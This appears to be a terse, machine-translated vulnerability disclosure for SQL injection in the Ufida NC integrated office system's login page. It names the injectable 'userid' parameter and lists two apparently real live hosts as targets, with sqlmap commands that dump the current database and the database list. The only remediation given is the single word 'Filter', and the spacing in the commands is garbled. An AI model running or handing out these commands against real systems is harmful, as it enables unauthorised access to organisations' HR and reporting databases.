Ufida nc Integrated Office System foreground SQL Injection Vulnerability
Ufida nc Integrated Office System logon Interface SQL injection vulnerability, which can affect databases of multiple office systems (such as HR Resource Management System and UFO Reporting System) at the same time
Injection link:/epp/LoginServerDo. jsp? Userid = 1111 & pwd = 2222 injection parameter: userid
Test Case: (1) http://zfkg.com: 8081/
Injection link: http://zfkg.com: 8081/epp/LoginServerDo. jsp? Userid = 1' & pwd = 1
SQLMAP injection:
Python sqlmap. py-u 'HTTP: // zfkg.com: 8081/epp/LoginServerDo. jsp? Userid = 1 & pwd = 1'-p userid -- level 5 -- risk 3 -- dbms oracle -- batch -- random-agent -- current-db-v 3
Python sqlmap. py-u 'HTTP: // zfkg.com: 8081/epp/LoginServerDo. jsp? Userid = 1 & pwd = 1'-p userid -- level 5 -- risk 3 -- dbms oracle -- batch -- random-agent -- dbs-v 3
(2) http://nc.xhlbdc.com
Injection link: http://nc.xhlbdc.com/epp/LoginServerDo.jsp? Userid = 1' & pwd = 1
SQLMAP injection:
Python sqlmap. py-u 'HTTP: // nc.xhlbdc.com/epp/LoginServerDo.jsp? Userid = 1 & pwd = 1'-p userid -- level 5 -- risk 3 -- dbms oracle -- batch -- random-agent -- current-db-v 3
Solution:
Filter